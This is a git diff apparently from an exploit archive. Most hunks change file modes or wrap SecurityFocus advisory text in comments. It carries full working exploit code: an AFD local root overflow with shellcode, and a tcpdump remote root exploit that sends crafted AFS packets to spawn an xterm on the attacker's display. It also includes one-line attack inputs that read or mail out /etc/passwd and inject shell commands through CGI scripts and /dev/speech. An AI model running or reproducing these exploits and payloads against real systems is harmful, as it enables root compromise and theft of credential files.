a/platforms/unix/local/20766.c +++ b/platforms/unix/local/20766.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/2603/info The CDE Session Manager 'dtsession' is vulnerable to a buffer overflow that could yield root privileges to an attacker. @@ -5,6 +6,7 @@ The CDE Session Manager 'dtsession' is vulnerable to a buffer overflow that coul The bug exists in dtsession's LANG environment variable parser. If an overly long LANG variable is set and dtsession is subsequently run, dtsession will overflow. Because the dtsession binary is setuid root, the overflow allows an attacker to execute arbitrary code as root. An exploit is available against x86 Solaris installations of CDE. +*/ /*## copyright LAST STAGE OF DELIRIUM mar 2001 poland *://lsd-pl.net/ #*/ /*## /usr/dt/bin/dtsession #*/ diff --git a/platforms/unix/local/20769.txt b/platforms/unix/local/20769.txt old mode 100755 new mode 100644 index 1d4a76c38..6f110641d --- a/platforms/unix/local/20769.txt +++ b/platforms/unix/local/20769.txt @@ -11,4 +11,4 @@ ln -s /etc/passwd /tmp/ppd.trace /opt/bin/ppd -T cat /etc/passwd -[..] \ No newline at end of file +[..] \ No newline at end of file diff --git a/platforms/unix/local/20905.txt b/platforms/unix/local/20905.txt old mode 100755 new mode 100644 index 870100b18..de2f53d01 --- a/platforms/unix/local/20905.txt +++ b/platforms/unix/local/20905.txt @@ -57,4 +57,4 @@ total 3 -rw------- 1 root root 102 May 7 09:59 uwe -rw-r----- 1 fcron fcron 15 May 7 09:59 uwe.orig -6. Root's crontab is gone, look into your backups. \ No newline at end of file +6. Root's crontab is gone, look into your backups. \ No newline at end of file diff --git a/platforms/unix/local/20906.c b/platforms/unix/local/20906.c old mode 100755 new mode 100644 diff --git a/platforms/unix/local/20923.c b/platforms/unix/local/20923.c old mode 100755 new mode 100644 index aa20ff6fd..eba88af28 --- a/platforms/unix/local/20923.c +++ b/platforms/unix/local/20923.c @@ -1,11 +1,12 @@ +/* source: http://www.securityfocus.com/bid/2865/info - The LPRng software is an enhanced, extended, and portable implementation of the Berkeley LPR print spooler functionality. When the LPRng daemon is initialized, it fails to drop its supplementary groups. As a result, the daemon and any child processes it spawns will maintain the supplementary groups inherited from the process that started LPRng. Processes or routines which are meant to be run with lowered privileges will run with these supplementary group privileges. Vulnerable sections of program code are often run with lowered privileges because of susceptibility to attacks. Because they are not dropped, these privileges may be gained by an attacker if LPRng is vulnerable to such attacks. +*/ /******************************************************************** Redhat 7.0 (mebe 7.1 ?) diff --git a/platforms/unix/local/20960.c b/platforms/unix/local/20960.c old mode 100755 new mode 100644 diff --git a/platforms/unix/local/20963.c b/platforms/unix/local/20963.c old mode 100755 new mode 100644 diff --git a/platforms/unix/local/20964.c b/platforms/unix/local/20964.c old mode 100755 new mode 100644 diff --git a/platforms/unix/local/21045.c b/platforms/unix/local/21045.c old mode 100755 new mode 100644 diff --git a/platforms/unix/local/21073.txt b/platforms/unix/local/21073.txt old mode 100755 new mode 100644 index b530babc3..f9f4c51c7 --- a/platforms/unix/local/21073.txt +++ b/platforms/unix/local/21073.txt @@ -4,4 +4,4 @@ When a malformed request is made for a Java Server Page the server displays an e Jakarta Tomcat can be configured to display an alternate error file. By default it is not. -http://webserver.com/\java.jsp \ No newline at end of file +http://webserver.com/\java.jsp \ No newline at end of file diff --git a/platforms/unix/local/21101.sh b/platforms/unix/local/21101.sh index 4d5d9880f..98b38f40b 100755 --- a/platforms/unix/local/21101.sh +++ b/platforms/unix/local/21101.sh @@ -23,4 +23,4 @@ echo = Exploiting... echo quit | $bloc/rlmadmin -d /tmp/peace > peace.log mv peace.log /tmp; rm dictionary rlmadmin.help vendors echo = Done! -echo == Now look in /tmp/peace.log! \ No newline at end of file +echo == Now look in /tmp/peace.log! \ No newline at end of file diff --git a/platforms/unix/local/21105.c b/platforms/unix/local/21105.c old mode 100755 new mode 100644 diff --git a/platforms/unix/local/21106.txt b/platforms/unix/local/21106.txt old mode 100755 new mode 100644 index e7d606111..51dc7e364 --- a/platforms/unix/local/21106.txt +++ b/platforms/unix/local/21106.txt @@ -19,4 +19,4 @@ $ THISHOST=`uuname -l` $ WHEREYOUWANTIT=/var/spool/uucp/${THISHOST}/X./X.${THISHOST}X1337 $ uux 'uucp --config=/tmp/config.uucp /tmp/commands.uucp '${WHEREYOUWANTIT} -The commands in /tmp/commands.uucp file will be executed by uuxqt, with the uid/gid of uucp. \ No newline at end of file +The commands in /tmp/commands.uucp file will be executed by uuxqt, with the uid/gid of uucp. \ No newline at end of file diff --git a/platforms/unix/local/21108.txt b/platforms/unix/local/21108.txt old mode 100755 new mode 100644 index 226fe4de4..1d87eade8 --- a/platforms/unix/local/21108.txt +++ b/platforms/unix/local/21108.txt @@ -4,4 +4,4 @@ SpeechD is a device-independent layer for speech synthesis under Linux, providin SpeechD has been found to contain a flaw under certain implementations which can permit a local user to pass malcious commands to the /dev/speech device, and have them executed with the privilege level of the speechd user, which is usually root. -echo "';[hostile shell command]" >/dev/speech \ No newline at end of file +echo "';[hostile shell command]" >/dev/speech \ No newline at end of file diff --git a/platforms/unix/local/21120.c b/platforms/unix/local/21120.c old mode 100755 new mode 100644 diff --git a/platforms/unix/local/21150.c b/platforms/unix/local/21150.c old mode 100755 new mode 100644 diff --git a/platforms/unix/local/21414.c b/platforms/unix/local/21414.c old mode 100755 new mode 100644 diff --git a/platforms/unix/local/21566.c b/platforms/unix/local/21566.c old mode 100755 new mode 100644 diff --git a/platforms/unix/local/21592.c b/platforms/unix/local/21592.c old mode 100755 new mode 100644 diff --git a/platforms/unix/local/21758.txt b/platforms/unix/local/21758.txt old mode 100755 new mode 100644 index b43dcc4d9..a4b75f390 --- a/platforms/unix/local/21758.txt +++ b/platforms/unix/local/21758.txt @@ -14,4 +14,4 @@ id > /tmp/I_WAS_HERE [ctrl+d] $ chmod a+x /tmp/xkbcomp $ Xserver -xkbdir /tmp -[X server executes /tmp/xkbcomp] \ No newline at end of file +[X server executes /tmp/xkbcomp] \ No newline at end of file diff --git a/platforms/unix/local/21760.c b/platforms/unix/local/21760.c old mode 100755 new mode 100644 diff --git a/platforms/unix/local/21771.c b/platforms/unix/local/21771.c old mode 100755 new mode 100644 index b1530d145..7beeb0eb8 --- a/platforms/unix/local/21771.c +++ b/platforms/unix/local/21771.c @@ -1,63 +1,65 @@ +/* source: http://www.securityfocus.com/bid/5626/info - + AFD (Automatic File Distributor) is prone to a number of locally exploitable stack and heap based buffer overflow conditions. These issues are all related to insufficient bounds checking of externally supplied values for the working directory, either via the command line or through an environment variable. - + A number of the vulnerable AFD binaries are installed setuid root and may potentially be exploited by a local attacker to execute arbitrary code as root. +*/ + +#include <stdio.h> +#include <stdlib.h> +#include <string.h> - #include <stdio.h> - #include <stdlib.h> - #include <string.h> +char shellcode[] = + "\xeb\x0a" /* 10-byte-jump; setreuid(0,0); execve /bin/sh; exit(0); */ + "--netric--" + "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f" + "\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x8d\x54\x24\x08\x50\x53\x8d" + "\x0c\x24\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"; - char shellcode[] = - "\xeb\x0a" /* 10-byte-jump; setreuid(0,0); execve /bin/sh; exit(0); */ - "--netric--" - "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f" - "\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x8d\x54\x24\x08\x50\x53\x8d" - "\x0c\x24\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"; +int +main(int argc, char *argv[]) +{ + char buffer[1135]; - int - main(int argc, char *argv[]) - { - char buffer[1135]; + unsigned int retloc = 0xbfffe360; + unsigned int ret = 0x0806f020; /* &shellcode */ - unsigned int retloc = 0xbfffe360; - unsigned int ret = 0x0806f020; /* &shellcode */ + if (argc > 1) retloc = strtoul(argv[1], &argv[1], 16); + if (argc > 2) ret = strtoul(argv[2], &argv[2], 16); - if (argc > 1) retloc = strtoul(argv[1], &argv[1], 16); - if (argc > 2) ret = strtoul(argv[2], &argv[2], 16); + memset(buffer, 0x41, sizeof(buffer)); + memcpy(buffer, "MON_WORK_DIR=",13); + memcpy(buffer+13, shellcode, strlen(shellcode)); - memset(buffer, 0x41, sizeof(buffer)); - memcpy(buffer, "MON_WORK_DIR=",13); - memcpy(buffer+13, shellcode, strlen(shellcode)); + buffer[1117] = 0xff; /* prev_size */ + buffer[1118] = 0xff; + buffer[1119] = 0xff; + buffer[1120] = 0xff; - buffer[1117] = 0xff; /* prev_size */ - buffer[1118] = 0xff; - buffer[1119] = 0xff; - buffer[1120] = 0xff; + buffer[1121] = 0xfc; /* size field */ + buffer[1122] = 0xff; + buffer[1123] = 0xff; + buffer[1124] = 0xff; - buffer[1121] = 0xfc; /* size field */ - buffer[1122] = 0xff; - buffer[1123] = 0xff; - buffer[1124] = 0xff; + buffer[1126] = (retloc & 0x000000ff); /* FD */ + buffer[1127] = (retloc & 0x0000ff00) >> 8; + buffer[1128] = (retloc & 0x00ff0000) >> 16; + buffer[1129] = (retloc & 0xff000000) >> 24; - buffer[1126] = (retloc & 0x000000ff); /* FD */ - buffer[1127] = (retloc & 0x0000ff00) >> 8; - buffer[1128] = (retloc & 0x00ff0000) >> 16; - buffer[1129] = (retloc & 0xff000000) >> 24; + buffer[1130] = (ret & 0x000000ff); /* BK */ + buffer[1131] = (ret & 0x0000ff00) >> 8; + buffer[1132] = (ret & 0x00ff0000) >> 16; + buffer[1133] = (ret & 0xff000000) >> 24; - buffer[1130] = (ret & 0x000000ff); /* BK */ - buffer[1131] = (ret & 0x0000ff00) >> 8; - buffer[1132] = (ret & 0x00ff0000) >> 16; - buffer[1133] = (ret & 0xff000000) >> 24; + buffer[1134] = 0x0; + putenv(buffer); - buffer[1134] = 0x0; - putenv(buffer); + fprintf(stdout, "AFD 1.2.14 local root exploit by eSDee of Netric (www.netric.org)\n"); + fprintf(stdout, "-----------------------------------------------------------------\n"); + fprintf(stdout, "Ret = 0x%08x\n", ret); + fprintf(stdout, "Retloc = 0x%08x\n", retloc); - fprintf(stdout, "AFD 1.2.14 local root exploit by eSDee of Netric (www.netric.org)\n"); - fprintf(stdout, "-----------------------------------------------------------------\n"); - fprintf(stdout, "Ret = 0x%08x\n", ret); - fprintf(stdout, "Retloc = 0x%08x\n", retloc); - - execl("/bin/mon_ctrl", "mon_ctrl", NULL); - return 0; - } \ No newline at end of file + execl("/bin/mon_ctrl", "mon_ctrl", NULL); + return 0; +} \ No newline at end of file diff --git a/platforms/unix/local/21774.pl b/platforms/unix/local/21774.pl index 0efacc247..dd2808e96 100755 --- a/platforms/unix/local/21774.pl +++ b/platforms/unix/local/21774.pl @@ -62,4 +62,4 @@ $buf_b .= $sc; $ENV{"_XKB_CHARSET"} = $buf_a; $ENV{"HOME"} = $buf_b; -exec("$b"); \ No newline at end of file +exec("$b"); \ No newline at end of file diff --git a/platforms/unix/local/21796.txt b/platforms/unix/local/21796.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/local/21797.txt b/platforms/unix/local/21797.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/local/21805.c b/platforms/unix/local/21805.c old mode 100755 new mode 100644 diff --git a/platforms/unix/local/21806.c b/platforms/unix/local/21806.c old mode 100755 new mode 100644 diff --git a/platforms/unix/local/21884.txt b/platforms/unix/local/21884.txt old mode 100755 new mode 100644 index 0bd1cd513..d52eef0bd --- a/platforms/unix/local/21884.txt +++ b/platforms/unix/local/21884.txt @@ -14,4 +14,4 @@ OR one of the following types of commands: smrsh -c "/ command" smrsh -c "../ command" smrsh -c "./ command" -smrsh -c "././ command" \ No newline at end of file +smrsh -c "././ command" \ No newline at end of file diff --git a/platforms/unix/local/22067.txt b/platforms/unix/local/22067.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/local/22324.c b/platforms/unix/local/22324.c old mode 100755 new mode 100644 diff --git a/platforms/unix/local/22325.c b/platforms/unix/local/22325.c old mode 100755 new mode 100644 diff --git a/platforms/unix/local/22331.c b/platforms/unix/local/22331.c old mode 100755 new mode 100644 diff --git a/platforms/unix/local/22332.c b/platforms/unix/local/22332.c old mode 100755 new mode 100644 diff --git a/platforms/unix/local/22442.c b/platforms/unix/local/22442.c old mode 100755 new mode 100644 diff --git a/platforms/unix/local/22912.c b/platforms/unix/local/22912.txt old mode 100755 new mode 100644 similarity index 93% rename from platforms/unix/local/22912.c rename to platforms/unix/local/22912.txt index 371f2ad7a..482b26721 --- a/platforms/unix/local/22912.c +++ b/platforms/unix/local/22912.txt @@ -29,4 +29,4 @@ ls: /tmp/owned: No such file or directory [uvadm@vegeta uvadm]$ /tmp/owned [root@vegeta uvadm]# id -uid=0(root) gid=503(uvadm) groups=503(uvadm) \ No newline at end of file +uid=0(root) gid=503(uvadm) groups=503(uvadm) \ No newline at end of file diff --git a/platforms/unix/local/22923.c b/platforms/unix/local/22923.c old mode 100755 new mode 100644 diff --git a/platforms/unix/local/22924.c b/platforms/unix/local/22924.c old mode 100755 new mode 100644 diff --git a/platforms/unix/local/23610.c b/platforms/unix/local/23610.c old mode 100755 new mode 100644 diff --git a/platforms/unix/local/24335.txt b/platforms/unix/local/24335.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/local/25333.c b/platforms/unix/local/25333.c old mode 100755 new mode 100644 diff --git a/platforms/unix/local/26753.c b/platforms/unix/local/26753.c old mode 100755 new mode 100644 diff --git a/platforms/unix/local/302.c b/platforms/unix/local/302.c old mode 100755 new mode 100644 diff --git a/platforms/unix/local/33572.txt b/platforms/unix/local/33572.txt old mode 100755 new mode 100644 index 6b1e345d5..1bb064190 --- a/platforms/unix/local/33572.txt +++ b/platforms/unix/local/33572.txt @@ -11,4 +11,4 @@ IBM DB2 9.7 Other versions may also be affected. -SELECT REPEAT(REPEAT('1',1000),1073741825) FROM SYSIBM.SYSDUMMY1 \ No newline at end of file +SELECT REPEAT(REPEAT('1',1000),1073741825) FROM SYSIBM.SYSDUMMY1 \ No newline at end of file diff --git a/platforms/unix/remote/14489.c b/platforms/unix/remote/14489.c old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/15244.txt b/platforms/unix/remote/15244.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/19101.c b/platforms/unix/remote/19101.c old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/19102.c b/platforms/unix/remote/19102.c old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/19110.c b/platforms/unix/remote/19110.c old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/19478.c b/platforms/unix/remote/19478.c old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/19479.c b/platforms/unix/remote/19479.c old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/19620.txt b/platforms/unix/remote/19620.txt old mode 100755 new mode 100644 index 7c195a301..d597fbf17 --- a/platforms/unix/remote/19620.txt +++ b/platforms/unix/remote/19620.txt @@ -31,4 +31,4 @@ return $valid_dir; How to d/l /etc/passwd ? Just add this to the form: <INPUT TYPE="hidden" NAME="reply_message_attach" -VALUE="text:/tmp/../etc/passwd"> \ No newline at end of file +VALUE="text:/tmp/../etc/passwd"> \ No newline at end of file diff --git a/platforms/unix/remote/19645.c b/platforms/unix/remote/19645.c old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/19690.txt b/platforms/unix/remote/19690.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/19694.txt b/platforms/unix/remote/19694.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/19722.txt b/platforms/unix/remote/19722.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/19785.txt b/platforms/unix/remote/19785.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/19797.txt b/platforms/unix/remote/19797.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/19847.c b/platforms/unix/remote/19847.c old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/19848.pm b/platforms/unix/remote/19848.pm old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/19849.pm b/platforms/unix/remote/19849.pm old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/20030.c b/platforms/unix/remote/20030.c old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/20046.txt b/platforms/unix/remote/20046.txt old mode 100755 new mode 100644 index 2ae88454b..aa665b55b --- a/platforms/unix/remote/20046.txt +++ b/platforms/unix/remote/20046.txt @@ -54,4 +54,4 @@ daemon:x:1:1::/: bin:x:2:2::/usr/bin: sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: -... \ No newline at end of file +... \ No newline at end of file diff --git a/platforms/unix/remote/20082.txt b/platforms/unix/remote/20082.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/20150.c b/platforms/unix/remote/20150.c old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/20163.c b/platforms/unix/remote/20163.c old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/20327.txt b/platforms/unix/remote/20327.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/20337.c b/platforms/unix/remote/20337.c old mode 100755 new mode 100644 index 1a29fb7ba..cc0591355 --- a/platforms/unix/remote/20337.c +++ b/platforms/unix/remote/20337.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/1870/info tcpdump is a popular network monitoring tool used for watching network traffic written by the Lawrence Berkeley Laboratory. It must at least begin execution as root since it opens and reads from the link layer interface (through pcap). It is usually run directly by/as root. @@ -5,171 +6,172 @@ tcpdump is a popular network monitoring tool used for watching network traffic w tcpdump is vulnerable to a remotely exploitable buffer overflow in it's parsing of AFS ACL packets. This is likely the result of the AFS packet fields received over a network interface being copied into memory buffers of predefined length without checks for size. The excessive data could be used to overwrite stack variables if constructed correctly and allow the attacker (who would have sent the custom ACL packets) to gain remote access to the victim host. Exploitation of this vulnerability would likely yield root access for the perpetrator. +*/ - /* - * Tcpdump remote root xploit (3.5.2) (with -s 500 or higher) - * for Linux x86 - * - * By: Zhodiac <zhodiac@softhome.net> - * - * !Hispahack Research Team - * http://hispahack.ccc.de - * - * This xploit was coded only to prove it can be done :) - * - * As usual, this xploit is dedicated to [CrAsH]] - * She is "the one" and "only one" :*************** - * - * #include <standar/disclaimer.h> - * - * Madrid 2/1/2001 - * - * Spain r0x - * - */ +/* +* Tcpdump remote root xploit (3.5.2) (with -s 500 or higher) +* for Linux x86 +* +* By: Zhodiac <zhodiac@softhome.net> +* +* !Hispahack Research Team +* http://hispahack.ccc.de +* +* This xploit was coded only to prove it can be done :) +* +* As usual, this xploit is dedicated to [CrAsH]] +* She is "the one" and "only one" :*************** +* +* #include <standar/disclaimer.h> +* +* Madrid 2/1/2001 +* +* Spain r0x +* +*/ - #include <stdio.h> - #include <netinet/in.h> - #include <sys/types.h> - #include <sys/socket.h> - #include <netdb.h> - #include <arpa/inet.h> +#include <stdio.h> +#include <netinet/in.h> +#include <sys/types.h> +#include <sys/socket.h> +#include <netdb.h> +#include <arpa/inet.h> - #define ADDR 0xbffff248 - #define OFFSET 0 - #define NUM_ADDR 10 - #define NOP 0x90 - #define NUM_NOP 100 +#define ADDR 0xbffff248 +#define OFFSET 0 +#define NUM_ADDR 10 +#define NOP 0x90 +#define NUM_NOP 100 - #define RX_CLIENT_INITIATED 1 - #define RX_PACKET_TYPE_DATA 1 - #define FS_RX_DPORT 7000 - #define FS_RX_SPORT 7001 - #define AFS_CALL 134 +#define RX_CLIENT_INITIATED 1 +#define RX_PACKET_TYPE_DATA 1 +#define FS_RX_DPORT 7000 +#define FS_RX_SPORT 7001 +#define AFS_CALL 134 - struct rx_header { - u_int32_t epoch; - u_int32_t cid; - u_int32_t callNumber; - u_int32_t seq; - u_int32_t serial; - u_char type; - u_char flags; - u_char userStatus; - u_char securityIndex; - u_short spare; - u_short serviceId; - }; +struct rx_header { + u_int32_t epoch; + u_int32_t cid; + u_int32_t callNumber; + u_int32_t seq; + u_int32_t serial; + u_char type; + u_char flags; + u_char userStatus; + u_char securityIndex; + u_short spare; + u_short serviceId; +}; - char shellcode[] = /* By Zhodiac <zhodiac@softhome.net> */ - "\xeb\x57\x5e\xb3\x21\xfe\xcb\x88\x5e\x2c\x88\x5e\x23" - "\x88\x5e\x1f\x31\xdb\x88\x5e\x07\x46\x46\x88\x5e\x08" - "\x4e\x4e\x88\x5e\xFF\x89\x5e\xfc\x89\x76\xf0\x8d\x5e" - "\x08\x89\x5e\xf4\x83\xc3\x03\x89\x5e\xf8\x8d\x4e\xf0" - "\x89\xf3\x8d\x56\xfc\x31\xc0\xb0\x0e\x48\x48\x48\xcd" - "\x80\x31\xc0\x40\x31\xdb\xcd\x80\xAA\xAA\xAA\xAA\xBB" - "\xBB\xBB\xBB\xCC\xCC\xCC\xCC\xDD\xDD\xDD\xDD\xe8\xa4" - "\xff\xff\xff" - "/bin/shZ-cZ/usr/X11R6/bin/xtermZ-utZ-displayZ"; +char shellcode[] = /* By Zhodiac <zhodiac@softhome.net> */ + "\xeb\x57\x5e\xb3\x21\xfe\xcb\x88\x5e\x2c\x88\x5e\x23" + "\x88\x5e\x1f\x31\xdb\x88\x5e\x07\x46\x46\x88\x5e\x08" + "\x4e\x4e\x88\x5e\xFF\x89\x5e\xfc\x89\x76\xf0\x8d\x5e" + "\x08\x89\x5e\xf4\x83\xc3\x03\x89\x5e\xf8\x8d\x4e\xf0" + "\x89\xf3\x8d\x56\xfc\x31\xc0\xb0\x0e\x48\x48\x48\xcd" + "\x80\x31\xc0\x40\x31\xdb\xcd\x80\xAA\xAA\xAA\xAA\xBB" + "\xBB\xBB\xBB\xCC\xCC\xCC\xCC\xDD\xDD\xDD\xDD\xe8\xa4" + "\xff\xff\xff" + "/bin/shZ-cZ/usr/X11R6/bin/xtermZ-utZ-displayZ"; - long resolve(char *name) { - struct hostent *hp; - long ip; +long resolve(char *name) { + struct hostent *hp; + long ip; - if ((ip=inet_addr(name))==-1) { - if ((hp=gethostbyname(name))==NULL) { - fprintf (stderr,"Can't resolve host name [%s].\n",name); - exit(-1); - } - memcpy(&ip,(hp->h_addr),4); - } - return(ip); + if ((ip=inet_addr(name))==-1) { + if ((hp=gethostbyname(name))==NULL) { + fprintf (stderr,"Can't resolve host name [%s].\n",name); + exit(-1); + } + memcpy(&ip,(hp->h_addr),4); + } + return(ip); +} + + +int main (int argc, char *argv[]) { + + struct sockaddr_in addr,sin; + int sock,aux, offset=OFFSET; + char buffer[4048], *chptr; + struct rx_header *rxh; + long int *lptr, return_addr=ADDR; + + + fprintf(stderr,"\n!Hispahack Research Team (http://hispahack.ccc.de)\n"); + fprintf(stderr,"Tcpdump 3.5.2 xploit by Zhodiac <zhodiac@softhome.net>\n\n"); + + + if (argc<3) { + printf("Usage: %s <host> <display> [offset]\n",argv[0]); + exit(-1); } + if (argc==4) offset=atoi(argv[3]); + return_addr+=offset; - int main (int argc, char *argv[]) { + fprintf(stderr,"Using return addr: %#x\n",return_addr); - struct sockaddr_in addr,sin; - int sock,aux, offset=OFFSET; - char buffer[4048], *chptr; - struct rx_header *rxh; - long int *lptr, return_addr=ADDR; + addr.sin_family=AF_INET; + addr.sin_addr.s_addr=resolve(argv[1]); + addr.sin_port=htons(FS_RX_DPORT); - - fprintf(stderr,"\n!Hispahack Research Team (http://hispahack.ccc.de)\n"); - fprintf(stderr,"Tcpdump 3.5.2 xploit by Zhodiac <zhodiac@softhome.net>\n\n"); - - - if (argc<3) { - printf("Usage: %s <host> <display> [offset]\n",argv[0]); - exit(-1); - } - - if (argc==4) offset=atoi(argv[3]); - return_addr+=offset; - - fprintf(stderr,"Using return addr: %#x\n",return_addr); - - addr.sin_family=AF_INET; - addr.sin_addr.s_addr=resolve(argv[1]); - addr.sin_port=htons(FS_RX_DPORT); - - if ((sock=socket(AF_INET, SOCK_DGRAM,0))<0) { - perror("socket()"); - exit(-1); - } - - sin.sin_family=AF_INET; - sin.sin_addr.s_addr=INADDR_ANY; - sin.sin_port=htons(FS_RX_SPORT); - - if (bind(sock,(struct sockaddr*)&sin,sizeof(sin))<0) { - perror("bind()"); - exit(-1); - } - - memset(buffer,0,sizeof(buffer)); - rxh=(struct rx_header *)buffer; - - rxh->type=RX_PACKET_TYPE_DATA; - rxh->seq=htonl(1); - rxh->flags=RX_CLIENT_INITIATED; - - lptr=(long int *)(buffer+sizeof(struct rx_header)); - *(lptr++)=htonl(AFS_CALL); - *(lptr++)=htonl(1); - *(lptr++)=htonl(2); - *(lptr++)=htonl(3); - - *(lptr++)=htonl(420); - chptr=(char *)lptr; - sprintf(chptr,"1 0\n"); - chptr+=4; - - memset(chptr,'A',120); - chptr+=120; - lptr=(long int *)chptr; - for (aux=0;aux<NUM_ADDR;aux++) *(lptr++)=return_addr; - chptr=(char *)lptr; - memset(chptr,NOP,NUM_NOP); - chptr+=NUM_NOP; - shellcode[30]=(char)(46+strlen(argv[2])); - memcpy(chptr,shellcode,strlen(shellcode)); - chptr+=strlen(shellcode); - memcpy(chptr,argv[2],strlen(argv[2])); - chptr+=strlen(argv[2]); - - sprintf(chptr," 1\n"); - - if (sendto(sock,buffer,520,0,&addr,sizeof(addr))==-1) { - perror("send()"); - exit(-1); - } - - fprintf(stderr,"Packet with Overflow sent, now wait for the xterm!!!! :)\n\n"); - - close(sock); - return(0); + if ((sock=socket(AF_INET, SOCK_DGRAM,0))<0) { + perror("socket()"); + exit(-1); } - ------- tcpdump-xploit.c ---------- \ No newline at end of file + sin.sin_family=AF_INET; + sin.sin_addr.s_addr=INADDR_ANY; + sin.sin_port=htons(FS_RX_SPORT); + + if (bind(sock,(struct sockaddr*)&sin,sizeof(sin))<0) { + perror("bind()"); + exit(-1); + } + + memset(buffer,0,sizeof(buffer)); + rxh=(struct rx_header *)buffer; + + rxh->type=RX_PACKET_TYPE_DATA; + rxh->seq=htonl(1); + rxh->flags=RX_CLIENT_INITIATED; + + lptr=(long int *)(buffer+sizeof(struct rx_header)); + *(lptr++)=htonl(AFS_CALL); + *(lptr++)=htonl(1); + *(lptr++)=htonl(2); + *(lptr++)=htonl(3); + + *(lptr++)=htonl(420); + chptr=(char *)lptr; + sprintf(chptr,"1 0\n"); + chptr+=4; + + memset(chptr,'A',120); + chptr+=120; + lptr=(long int *)chptr; + for (aux=0;aux<NUM_ADDR;aux++) *(lptr++)=return_addr; + chptr=(char *)lptr; + memset(chptr,NOP,NUM_NOP); + chptr+=NUM_NOP; + shellcode[30]=(char)(46+strlen(argv[2])); + memcpy(chptr,shellcode,strlen(shellcode)); + chptr+=strlen(shellcode); + memcpy(chptr,argv[2],strlen(argv[2])); + chptr+=strlen(argv[2]); + + sprintf(chptr," 1\n"); + + if (sendto(sock,buffer,520,0,&addr,sizeof(addr))==-1) { + perror("send()"); + exit(-1); + } + + fprintf(stderr,"Packet with Overflow sent, now wait for the xterm!!!! :)\n\n"); + + close(sock); + return(0); + } + +//------- tcpdump-xploit.c ---------- \ No newline at end of file diff --git a/platforms/unix/remote/20340.c b/platforms/unix/remote/20340.c old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/20374.c b/platforms/unix/remote/20374.c old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/20394.c b/platforms/unix/remote/20394.c old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/20395.c b/platforms/unix/remote/20395.c old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/20413.txt b/platforms/unix/remote/20413.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/20414.c b/platforms/unix/remote/20414.c old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/20449.txt b/platforms/unix/remote/20449.txt old mode 100755 new mode 100644 index aa886c61c..a2238866a --- a/platforms/unix/remote/20449.txt +++ b/platforms/unix/remote/20449.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/2026/info WebGlimpse and GlimpseHTTP are web indexing and search engine programs with some associated management scripts. GlimpseHTTP up to and including 2.0, and WebGlimpse prior to version 1.5, suffer from a common vulnerability involving the component "aglimpse". This script fails to filter the pipe metacharacter, allowing arbitrary command execution. The demonstration exploit for this vulnerability includes the unix shell "IFS" (Internal Field Separator) variable for situations where the web server filters space characters - by setting this to an acceptable character ("5" in the example exploit) it is possible to use commands with more than one field. (eg., "mail me@myhost.tld"). -GET /cgi-bin/aglimpse|IFS=5;CMD=mail5drazvan\@pop3.kappa.ro\</etc/passwd;eval5$CMD;echo \ No newline at end of file +GET /cgi-bin/aglimpse|IFS=5;CMD=mail5drazvan\@pop3.kappa.ro\</etc/passwd;eval5$CMD;echo \ No newline at end of file diff --git a/platforms/unix/remote/20462.txt b/platforms/unix/remote/20462.txt old mode 100755 new mode 100644 index a0f4c54fc..6bc0f939d --- a/platforms/unix/remote/20462.txt +++ b/platforms/unix/remote/20462.txt @@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/2056/info Hylafax is a popular fax server software package designed to run on multiple UNIX operating systems. Unpatched version of Hylafax ship with an insecure script, faxsurvey, which allows remote command execution with the privileges of the web server process. This can be exploited simply by passing the command as a parameter to the script - see exploit. Consequences could include web site defacements, exploiting locally accessible vulnerabilities to gain further privileges, etc. -http://target.host/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd \ No newline at end of file +http://target.host/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd \ No newline at end of file diff --git a/platforms/unix/remote/20469.txt b/platforms/unix/remote/20469.txt old mode 100755 new mode 100644 index e15262b3a..1ddfb5001 --- a/platforms/unix/remote/20469.txt +++ b/platforms/unix/remote/20469.txt @@ -11,4 +11,4 @@ These commands will be executed with the privilege level of the CGI script (comm This will execute and echo back the uid. 